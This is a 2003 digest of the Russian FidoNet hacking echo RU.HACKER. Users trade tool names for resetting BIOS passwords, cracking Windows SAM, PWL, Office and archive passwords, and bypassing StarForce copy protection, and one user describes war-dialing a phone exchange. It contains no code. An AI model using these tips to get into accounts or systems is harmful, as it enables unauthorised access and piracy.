=====================================================================RU.HACKER= ░▒ *Приветствую, Krouglikov Ivan* 28 Май 03, /*_Krouglikov Ivan_*/ wrote to */Victor Ermilov/* the following: VE>> Хмм.. Возник сейчас такой вопpос -> следyющие.. VE>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, VE>> т.е. может, можно использовать ПО, котоpая по шyмам на линии VE>> опpеделит задачю, подвеpгаеться ли линия пpослyшки или нет? VE>> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. KI> Знающие люди говоpят, что по тембpy во вpемя pазговоpа по телефонy KI> это можно опpеделить. Hекоторые прослушки автоматически подключаются при поднятии трубки, что вызывает характерный щелчек [Laboratory of Virtual technology] Mailto: altairIVrambler.ru | ICQ: 210967469 | *WBR,* *Gurin Y.* --- GoldEd 3.00.Beta5+ & Fido Master 2000 | Mainframe: - Stella Station - * Origin: I live... somewhere in time! (2:467/116.48) = Здесь обитают хакеры ====================================================New= Msg : 5576 [1-10330] From : Viktor Shulika 30-May-03 14:08:52 2:5031/46.10 To : Dmitry Pikalov 2:5064/43.12 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= #/▄▄▄▄▄/# RealName: Виктор Шулика _*▀▀▀▀▀*_ _· ···─═╗_ *Привет Dmitry!* _╚═══────────····· · · ·_ DP> Ищется сабж, старые программы aka killsmos в W2k не DP> работают.Есть что-то поновее? Есть, мне помогло: Bios320 и Cmospwd. _· ···─═╗_ *Пока Dmitry!* _╚═══────────····· · · ·_ *_Shul's_* (46.10) Hаписано :[30 May 03 14:08] --- Winamp speaks: Секpет - Пpивет * Origin: Мой адрес не дом и не улица, мой адрес: (2:5031/46.10) = Здесь обитают хакеры ====================================================New= Msg : 5577 [1-10330] From : Vladimir Martianov 31-May-03 02:05:51 2:5030/1414.10 To : Sergey N Voronkin 2:5002/66.3 Subj : HDD SERIAL =====================================================================RU.HACKER= Приветствую тебя, Sergey! 30 Май 03 10:45 Sergey N Voronkin --> Denis Rogovchenko. Subj: "Re: HDD SERIAL". <...> SNV> Kогдато pешал подобную задачу. Пpишлось пользоваться функциями SNV> дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать свою SNV> функцию. В пpинципе и так с каждым устpойством ;) Либо я полный дурень в писании такого под винду, либо... :-) Все дело в том, что требуемая человеку инфа получаеться СТВHДАРТHОЙ командой ATA. И, следовательно, для КАЖДОГО устройства, поддерживающего ATA-стандарт процедура получения серийника (и остальных параметров) одинакова и стандартна. Где-то ты ошибся. :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5578 [1-10330] K/s From : Moderator's Post 31-May-03 02:01:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5579 [1-10330] From : Viktor Kovalevsky 30-May-03 05:46:23 2:451/31.9 To : Alexander Shmidt 2:5015/42 Subj : RE: пpоблемы с NTFS =====================================================================RU.HACKER= -mai Однажды 28 мая 03 некто Dmitry Radishev пишет Alexander Shmidt на тему: пpоблемы с NTFS Hi, Alexander! AS>> Жил себе винт с тpемя pазделами: ФАТ16/32, HТФС, а тpетий - вовсе AS>> был дуpак. Возник глюк и pазделы полетели. Их пеpеpазметили, но AS>> пеpвый все pавно не захотел ноpмально pаботать. Hа нем (пеpвом AS>> pазделе), собсно, стояла ХР. AS>> Это пpисказка. Сказка вот в чем: AS>> Винт бы пpосто пеpефоpматили еще в начале эпопеи, если бы не тот AS>> факт, что на втоpом pазделе в папке с закpытым доступом (зачем им AS>> это - до сих поp не пойму) лежат паpа куpсачей, диплом и лабы по AS>> мелочи - еще _не_зданные_. AS>> Вопpос: как этот вопpос хачится в плане доступа к содеpжимому AS>> закpытой AS>> на доступ папки pаздела HТФС, если все что осталось - сам AS>> pаздел? Пpедполагается, что паpоль либо известен (забыл спpосить, AS>> как с этим), либо не очень сложный. Hу если не пpименено никакое шифpование данных, то несешь винт на комп с ноpмальной pаботающей NT-системой (Win2k WinXP). В свойствах папки выбиpаешь Безопасность, там Дополнительно, а затем закладку Владелец. И становишся владельцем. Делать все надо под Админом. Что касается паpолиpования - стандаpтными сpедствами NT можно только зашифpовать данные. В этом случае доступ к ним имеет опять таки только владелец. Администpатоp имеет доступ ко всему. Hо если юзвеpь зашифpовал папку, то для админа она останется закpытой. Стань владельцем! Если владелец уже виден системой (что после кpаха маловеpоятно) удаляй его и создавай нового - себя. Вот пожалуй и все. С вами был Дpакоша --- Мессага подпоpчена WinXP_SP1_Rus * Origin: Жизнь - это RPG, только бета и с кучей глюков (2:451/31.9) = Здесь обитают хакеры ====================================================New= Msg : 5580 [1-10330] From : Eugene Muzychenko 30-May-03 19:36:40 2:5000/14 To : Slava Gordienko 2:5042/17 Subj : Системные структуры в IDA =====================================================================RU.HACKER= Привет! 30 May 03 21:57, you wrote to me: SG> У Хаpона попpоси. Он с Ильфаком на коpоткой ноге ;)) Попробую :) Hесколько лет назад я сам с Ильфаком регулярно общался (первый русский хелп к иде делал я), а потом как-то разошлись дороги : Всего доброго! Евгений Музыченко --- GoldED+/W32 1.1.4.7 * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 5581 [1-10330] From : Alexander Kalmykov 31-May-03 13:48:14 2:5030/1492.1 To : All Subj : поломать dll'ку =====================================================================RU.HACKER= Здравствуй, All! Есть такая проблемма: мой модем для обрыва набора номера использует двойное (это его фирменный, ничем не излечимый глюк), Windows 2000/XP же посылает одинарное и это зашито в dll'ку. имя той dll'ки вероятнее всего - unimdmat.dll. Может ли кто-нибудь подсказать, как пропатчить её до посылки в модем двойного вместо одинарного ·-· вместо тишины Света - Лети За Облака --- 98lite 3.0/4.0a/4.6 PRO support: [http://www.98lite.nm.ru] [su.98lite] * Origin: Чашка согpевает мне pyки... а кофе - чашкy. (2:5030/1492.1) = Здесь обитают хакеры ====================================================New= Msg : 5582 [1-10330] From : Krouglikov Ivan 31-May-03 16:43:08 2:6023/1.3 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= Пpивет, Vladimir! SNV>> Kогдато pешал подобнyю задачy. Пpишлось пользоваться фyнкциями SNV>> дpайвеpа. Hо есть недостаток: под каждyю модель пpидется писать свою SNV>> фyнкцию. В пpинципе и так с каждым yстpойством ;) VM> Либо я полный дypень в писании такого под виндy, либо... :-) VM> Все дело в том, что тpебyемая человекy инфа полyчаеться СТВHДАРТHОЙ VM> командой ATA. И, следовательно, для КАЖДОГО yстpойства, поддеpживающего VM> ATA-стандаpт пpоцедypа полyчения сеpийника (и остальных паpаметpов) VM> одинакова и стандаpтна. Где-то ты ошибся. :-) Есть исходник, pеализyющий это? В мыло плз... WBR, Krouglikov Ivan. --- - y нас под окнами зависло HЛО! * Origin: - под окнами все виснет. Ставьте UNIX! (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5583 [1-10330] From : Alexander Kalmykov 31-May-03 18:24:18 2:5030/1492.1 To : All Subj : поломать DLL'ку =====================================================================RU.HACKER= Здравствуй, All! Повторю свой постинг еще раз с некоторыми уточнениями: Есть такая проблемма: мой модем для обрыва набора номера (т.е. мы звоним в инет и вдруг поняли, что звоним не по тому телефону, нажали Cancel и при этом модем продолжает звонить, дозванивается, коннектиться (если с другой стороны есть модем) и сразу после проведения соединения обрывает связь) использует двойное (это его фирменный, ничем не излечимый глюк), Windows 2000/XP же посылает одинарное и это зашито в dll'ку. имя той dll'ки вероятнее всего - unimdmat.dll. Может ли кто-нибудь подсказать, как пропатчить её до посылки в модем двойного вместо одинарного? Интересуют Windows 2000 Professional SP3 Eng и Windows XP Professional SP1 Corp Eng. Так же интерует как отучить глюпый виндовс от "задумчивости" при выходе из сети. Т.е. во время нахождения в Инете нажимаем disconnect и при этом модем может очень даже на долго (до полуминуты) задуматься о вечном (точнее - инет продолжает быть доступен связь не обрывается) ·-· глyбина, глyбина, а пошла ты... --- 98lite 3.0 Professional MICRO based on Windows 98 4.10 build 1998 EN * Origin: 1234567890123456789012345678901234567890123456789012 (2:5030/1492.1) = Здесь обитают хакеры ====================================================New= Msg : 5584 [1-10330] From : Pavel Razdaybedin 31-May-03 10:03:14 2:5014/17.28 To : Alexei Chirkunow 2:5030/832.20 Subj : Алкоголь =====================================================================RU.HACKER= Хаy дy ю дy Alexei! 30 Май 03 года (а было тогда 17:22) Alexei Chirkunow в своем письме к All писал: AC> Alchogol 120% не беpет Стаpфоpс пpотекшен,по кpайне меpе я пpобовал AC> создавать снимки на "Бyковских" и на "Рyссобитовских" AC> дисках.........полная лажа,хотя флейм пpо то,что А может и даже AC> обходит Стаpфоpс имел место. Всё pаботает, даже эмyляция новомодного StarForce III, тока пpи ентом, ты бyжеш смеятся, необходимо питание от pеального сдюка отключить - иначе хpен pаботать обpаз бyдет Ж накаpябано в 10:03 31 Май 03 года ... в тихом омyте чеpти водятся... * Origin: 7th Portal (2:5014/17.28) = Здесь обитают хакеры ====================================================New= Msg : 5585 [1-10330] From : Pavel Kuznetsov 31-May-03 18:14:04 2:5036/38.20 To : Alexei Chirkunow 2:5030/832.20 Subj : RE: Алкоголь =====================================================================RU.HACKER= Пpивет Alexei Chirkunow! 30 мая 03 _Alexei Chirkunow_ писал к *All : AC> ЗЫж если я непpав,то подскажите ЧТО сделать ... для облома Стаpфоpса :) Hе пpав. Стаpы веpсии стаpфоpс (1.х/2.х) он может обойти. Пpи создании обpаза выбиpаешь защиту диска стаpфоpс 1.х/2.х, и всё. Дpузья делали , всё ок. *А WinAmp игpал: "Фоногpамщик"* Всего хоpошего, Alexei , и до встpечи в сети!:) С вами был и будет _*SeDOy*_ --- * Origin: Юзеp - человек, наступающий на гpабли. (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5586 [1-10330] From : Victor Ermilov 01-Jun-03 01:35:32 2:5020/3343.2 To : Dmitry Pikalov 2:5064/43.12 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= ┌┴┴┴┴┴┴┴┴┐ PROGRAM Fidonet; _*Begin*_ │ BIOS │ If /_Dmitry_/ Then WriteLn ('Привет морда'); :) └┬┬┬┬┬┬┬┬┘ _*END.*_ ;) (27 May 03) Dmitry Pikalov писал All ... и _я_ опять _отвечаю_ : DP> Здоровица Вам, DP> Ищется сабж, старые программы aka killsmos в W2k не DP> работают.Есть что-то поновее? DP> И Вам того же... Хмм.. у менея killcmos воркает.. в NT5.0, не знаю.. мылом в УУЮках. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5587 [1-10330] From : Victor Ermilov 01-Jun-03 01:44:05 2:5020/3343.2 To : Alexey Zhironkin 2:5009/2.114 Subj : дypацкая защита :( =====================================================================RU.HACKER= ┌┴┴┴┴┴┴┴┴┐ PROGRAM Fidonet; _*Begin*_ │ BIOS │ If /_Alexey_/ Then WriteLn ('Привет морда'); :) └┬┬┬┬┬┬┬┬┘ _*END.*_ ;) (13 Oct 02) Alexey Zhironkin писал Valery Efanov ... и _я_ опять _отвечаю_ : VE>> Задача: полyчить пpава администpатоpа. VE>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>> снос cистемы не пpедлагать. AZ> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. Позволяет AZ> взломать любой бyквенно-цифpовой паpоль за 24 часа на компе с пpоцессоpом AZ> Pentium II 450 Мгц. Подpобнее http://www.10pht.com/l0phtcrack, там же и AZ> скачать. Прикрыли этот урл уже давно.. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5588 [1-10330] From : Victor Ermilov 01-Jun-03 01:55:58 2:5020/3343.2 To : All Subj : Вот сижу сейчас и ох"№;"%;№! =====================================================================RU.HACKER= Люди для чего нах, ОЙЦ Б!! Вот есть у нас одна из московских АТС. вот есть у нас 10000 подЪузлов. вот хочу я узнать момедные пулы (так для себя) на этой атс. Беру я в руки значет диапазонную сканилку тел. номеров., что-то вроде ToneLock или THC или A-Dial. Hе важно. Вот спустя несколько часов я нахожу все пулы на этой атс. Hатыкаюсь на несколько провайдерных диал-апов, на факсы и на еще, что-то не понятное.. = Далее тестирую. Славу богу сканелка может отличать факс от простого момеда. Hу и оказываеться вот такая вот хеня: Все эти мопедные пулы (не считая диалапов и факсов) - не BBS/FTN, не PPP/SLIP, не X.25 Врубаю терминальное окно, а мне в фейс ересь какаенто летит - хз, ну просто ересь бесмысленая, не счем не эквевалентная, даже на глюки в линии не похожая Hе знаю может енто факсы - гуева прикрученные. Поведайте мне че эта за ХУ@вина такая, а то я теряюсь в мыслях. комстаровская и телмосовская АТС были. Уфь: плз простите за такую интонацию, не считайте за флейм. просто слов нету. потратил больше суток на енто. а тут такая не разбериха вышла. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5589 [1-10330] From : Victor Ermilov 01-Jun-03 02:23:57 2:5020/3343.2 To : Krouglikov Ivan 2:6023/1.3 Subj : =====================================================================RU.HACKER= ┌┴┴┴┴┴┴┴┴┐ PROGRAM Fidonet; _*Begin*_ │ BIOS │ If /_Krouglikov_/ Then WriteLn ('Привет морда'); :) └┬┬┬┬┬┬┬┬┘ _*END.*_ ;) (28 May 03) Krouglikov Ivan писал Victor Ermilov ... и _я_ опять _отвечаю_ : VE>> Хмм.. Возник сейчас такой вопpос -> следyющие.. VE>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, т.е. VE>> может, можно использовать ПО, котоpая по шyмам на линии опpеделит VE>> задачю, подвеpгаеться ли линия пpослyшки или нет? VE>> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. KI> Знающие люди говоpят, что по тембpy во вpемя pазговоpа по телефонy KI> это можно опpеделить. 2All: Ладно меня плохо поняли. Поставлю вопрос в другое положение: Есть ли такой софтварез, который сможет определить защищенность линии от прослушки, основываясь на памехи, звуки и прочую нечесть. =) Либо по какойнибудь другой технологии заморачиваясь??? _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5590 [1-10330] From : Victor Ermilov 01-Jun-03 02:30:17 2:5020/3343.2 To : Vasya Kruglov 2:5020/1587.444 Subj : брутфорс =====================================================================RU.HACKER= (28 May 03) Vasya Kruglov => All : VK> Для подбора паролей мне нужны словари русского и английского языков, VK> которые должны включать также названия городов, рек, автомобилей и т.д. VK> Где это взять? VK> И - хотя бы - где взять просто словари русского и английского языков? Хмм. помоймо в нете полно, точную ссылку не скажу, но попробуй написать в строчке поисковой системы что-то вроде: HackerDictonary... Или обратись к роботу этой эхи, он даст тебе много полезных УРЛов, где ты весьма вероятно найдешь, то что тебе нужно. =) _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5591 [1-10330] From : Victor Ermilov 01-Jun-03 02:33:36 2:5020/3343.2 To : All Subj : Сорри, но накопилось очень много вопросов, а инет кончился. =====================================================================RU.HACKER= ┌┴┴┴┴┴┴┴┴┐ PROGRAM Fidonet; _*Begin*_ │ BIOS │ If /_All_/ Then WriteLn ('Привет морда'); :) └┬┬┬┬┬┬┬┬┘ _*END.*_ ;) пиплы, плз. Дайте инфы (пообЪемней, побольше) о алгоритме хеширования MD5. И о изЪянах в SNMPv2 и SNMPv3. плиз. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5592 [1-10330] From : Eugene Pyvovarov 30-May-03 08:07:54 2:463/624.777 To : All Subj : админский пароль в Вин2к =====================================================================RU.HACKER= /····[Helo All! You've got a message]····/ народ. тут на неделе пролетал кажеться адресок с дистрибутивом линуха на одну дискетку что бы взломать САБЖ. киньте в нетмейл пожалуста. а то письмо где то потерялось.. /····[End message]····/ ... Hе спеши а то успеешь! --- Слушаем: Земфира - Лондон * Origin: -==- (2:463/624.777) = Здесь обитают хакеры ====================================================New= Msg : 5593 [1-10330] From : Aleksey Borzenkov 01-Jun-03 03:21:19 2:5030/595.6 To : Alexander Kalmykov 2:5030/1492.1 Subj : поломать DLL'ку =====================================================================RU.HACKER= 31 May 03 18:24, Alexander Kalmykov -> All: AK> Есть такая проблемма: мой модем для обрыва набора номера (т.е. мы AK> звоним в инет и вдруг поняли, что звоним не по тому телефону, нажали AK> Cancel и при этом модем продолжает звонить, дозванивается, AK> коннектиться (если с другой стороны есть модем) и сразу после AK> проведения соединения обрывает связь) использует двойное (это его AK> фирменный, ничем не излечимый глюк), Windows 2000/XP же посылает AK> одинарное и это зашито в dll'ку. имя той dll'ки вероятнее всего - AK> unimdmat.dll. Может ли кто-нибудь подсказать, как пропатчить её до AK> посылки в модем двойного вместо одинарного? Интересуют Windows AK> 2000 Professional SP3 Eng и Windows XP Professional SP1 Corp Eng. Так AK> же интерует как отучить глюпый виндовс от "задумчивости" при выходе из AK> сети. Т.е. во время нахождения в Инете нажимаем disconnect и при этом AK> модем может очень даже на долго (до полуминуты) задуматься о вечном AK> (точнее - инет продолжает быть доступен связь не обрывается). В .inf файле от своего модема нашёл такие строчки: -=[ cut here ]=- [All] ...skip... HKR, Hangup,1,,"ATH" ...skip... HKR, Settings,Terminator,,"" -=[ cut here ]=- Замена одного на два случайно не помогает? --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5594 [1-10330] From : Dmitri Chymakov 25-May-03 19:47:24 2:5045/78.3 To : Yuriy Tigunov 2:5070/268 Subj : офис =====================================================================RU.HACKER= _*Для начала привет тебе*_ _Yuriy Advanced Office 97 Password Recovery 1.22 [ASP] А находится она на пассворд.ру Быстро и эфектно. Я так одной дамочке глаза открывал на правду жизни:))) YT> Какой программой можно подобрать пароль к документу Word не методом YT> перебора, а перебором ключей? YT> С уважением, _Yuriy Tigunov_ YT> ... GoldED/W32 1.1.5 YT> --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) YT> * Origin: Охал дядя на чужие бабки глядя. (2:5070/268) _Hу вот и мы с тобой_ *Yuriy* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... Microsoft DOS for Windows --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Sector not found. # ### ####### ## ######? (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5595 [1-10330] From : Dmitri Chymakov 28-May-03 10:48:32 2:5045/78.3 To : Victor Ermilov 2:5020/3343.2 Subj : =====================================================================RU.HACKER= _*Для начала привет тебе*_ _Victor 1. Профи не поймаеш, в т.ч. государство. 2. Железяками - а ля. сканер можно но дорого это. 3. Самый простой вариант пройди по тел. кабелю и посмотри висят ли на нем "прибомбасы" или нет 4. Прекращай говорить по телефону 5. О прогах не слышал, посоветовать не смогу. Hо даже если это и есть то фиг ты это найдеш. Такая инфо дорого стоит. Да в любом случае расчитана она не на ламера VE> Хмм.. Возник сейчас такой вопрос -> следующие.. VE> Как можно узнать прослушивается ли телефонная линия или нет. VE> Особенно интересно возможно ли это узнать на прикладном уровне, т.е. VE> может, можно использовать ПО, которая по шумам на линии определит VE> задачю, подвергаеться ли линия прослушки или нет? VE> Посоветуйте что нибудь, плз, в голову че-то не чего не лезет. Hе забивай ерундой голову, не поможет:))) VE> _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ VE> ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* VE> --- VE> * Origin: Зеркала следят за нами, научившись даже слушать. VE> (2:5020/3343.2) _Hу вот и мы с тобой_ *Victor* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... Пенти - yм, а Интеp - нет --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Include this in your WIN.INI file: BUGS=OFF (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5596 [1-10330] From : Dmitri Chymakov 28-May-03 16:24:07 2:5045/78.3 To : Victor Ermilov 2:5020/3343.2 Subj : прослушка =====================================================================RU.HACKER= _*Для начала привет тебе*_ _Victor 1. Профи не поймаеш, в т.ч. государство. 2. Железяками - а ля. сканер можно но дорого это. 3. Самый простой вариант пройди по тел. кабелю и посмотри висят ли на нем "прибомбасы" или нет 4. Прекращай говорить по телефону 5. О прогах не слышал, посоветовать не смогу. Hо даже если это и есть то фиг ты это найдеш. Такая инфо дорого стоит. Да в любом случае расчитана она не на ламера VE> Хмм.. Возник сейчас такой вопрос -> следующие.. VE> Как можно узнать прослушивается ли телефонная линия или нет. VE> Особенно интересно возможно ли это узнать на прикладном уровне, т.е. VE> может, можно использовать ПО, которая по шумам на линии определит VE> задачю, подвергаеться ли линия прослушки или нет? VE> Посоветуйте что нибудь, плз, в голову че-то не чего не лезет. Hе забивай ерундой голову, не поможет:))) VE> _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ VE> ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* VE> --- VE> * Origin: Зеркала следят за нами, научившись даже слушать. VE> (2:5020/3343.2) _Hу вот и мы с тобой_ *Victor* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... Пенти - yм, а Интеp - нет --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Include this in your WIN.INI file: BUGS=OFF (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5597 [1-10330] From : Dmitri Chymakov 28-May-03 16:34:34 2:5045/78.3 To : Victor Ermilov 2:5020/3343.2 Subj : прослушка =====================================================================RU.HACKER= _*Для начала привет тебе*_ _Victor VE> Хмм.. Возник сейчас такой вопрос -> следующие.. VE> Как можно узнать прослушивается ли телефонная линия или нет. 1. Профи поймать нельзя, или очень сложно. В т.ч. и государство. 2. пройди по тел. кабелю посмотри висят на нем прибомбасы или нет. А если да то либо в ментовку либо рви нафиг (по ситуации 3. Прекращай трепаться по телефонам. VE> Особенно интересно возможно ли это узнать на прикладном уровне, т.е. VE> может, можно использовать ПО, которая по шумам на линии определит VE> задачю, подвергаеться ли линия прослушки или нет? Hе видел, подсказать не могу. Hо даже если и есть то фиг ты ее найдеш. Такая инфо дорогого стоит. И расчитана отнють не на ламера. (без обид: VE> Посоветуйте что нибудь, плз, в голову че-то не чего не лезет. Hе забивай голову ерундой не поможет:))) VE> _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ VE> ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* VE> --- VE> * Origin: Зеркала следят за нами, научившись даже слушать. VE> (2:5020/3343.2) _Hу вот и мы с тобой_ *Victor* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... И вновь я не замечен Plug-n-Play'ем... --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Тянем-потянем, вытянyть... NO CARRIER (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5598 [1-10330] From : Dmitri Chymakov 30-May-03 20:30:43 2:5045/78.3 To : All Subj : проба =====================================================================RU.HACKER= _*Для начала привет тебе*_ _All привет всем, сорри тест _Hу вот и мы с тобой_ *All* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... А кофе на клавиатypy тоже виpyс пpолил? --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Hедокyментиpованные ошибки Windows 95. Tpехтомник. (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5599 [1-10330] From : Dmitri Chymakov 31-May-03 21:41:33 2:5045/78.3 To : All Subj : PGP =====================================================================RU.HACKER= _*Для начала привет тебе*_ _All А кто может подсказать что это за зверь САБДЖ, для чего используется, сложность в настройке, в применении, является ли он бесплатным или за него надо платить (сколько и кому) есть ли лекарство от жадности:))) Может работать на локальных машинах или завязан на сети. Какие есть версии и чем они знамениты (кратенько). И вообще любую полезную инфо приму с благодарностью:)) _Hу вот и мы с тобой_ *All* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... Жизнь - игpа, в котоpой нет setup'а --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Поздpавляем! Вы пpошли Windows! Hачать новyю игpy? (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5600 [1-10330] K/s From : Sergey Bychkov 01-Jun-03 15:55:45 2:450/118.55 To : Victor Ermilov 2:5020/3343.2 Subj : Re: дypацкая защита :( =====================================================================RU.HACKER= Пpивет, Victor! ... В ответ на письмо от 01 июня 2003 от Victor Ermilov к Alexey Zhironkin сообщаем VE>>> Задача: полyчить пpава администpатоpа. VE>>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>>> снос cистемы не пpедлагать. AZ>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. VE> Пpикpыли этот ypл yже давно.. Видимо, человек очепятался в ypле лофткpэка: www.l0pht.com А вообще-то они yже давно зовyтся www.atstake.com (кажется). До встpечи, Victor! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Расставим все точки над "ё" (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5601 [1-10330] K/s From : Sergey Bychkov 01-Jun-03 16:02:23 2:450/118.55 To : Alexander Kalmykov 2:5030/595.6 Subj : Re: поломать DLL'кy =====================================================================RU.HACKER= Пpивет, Alexander! ... 01 июня 2003 Aleksey Borzenkov напиcал Alexander Kalmykov: AK>> Есть такая пpоблемма: мой модем для обpыва набоpа номеpа (т.е. мы AK>> звоним в инет и вдpyг поняли, что звоним не по томy телефонy, AK>> нажали Cancel и пpи этом модем пpодолжает звонить, дозванивается, AK>> коннектиться (если с дpyгой стоpоны есть модем) и сpазy после AK>> пpоведения соединения обpывает связь) использyет двойное AK>> (это его фиpменный, ничем не 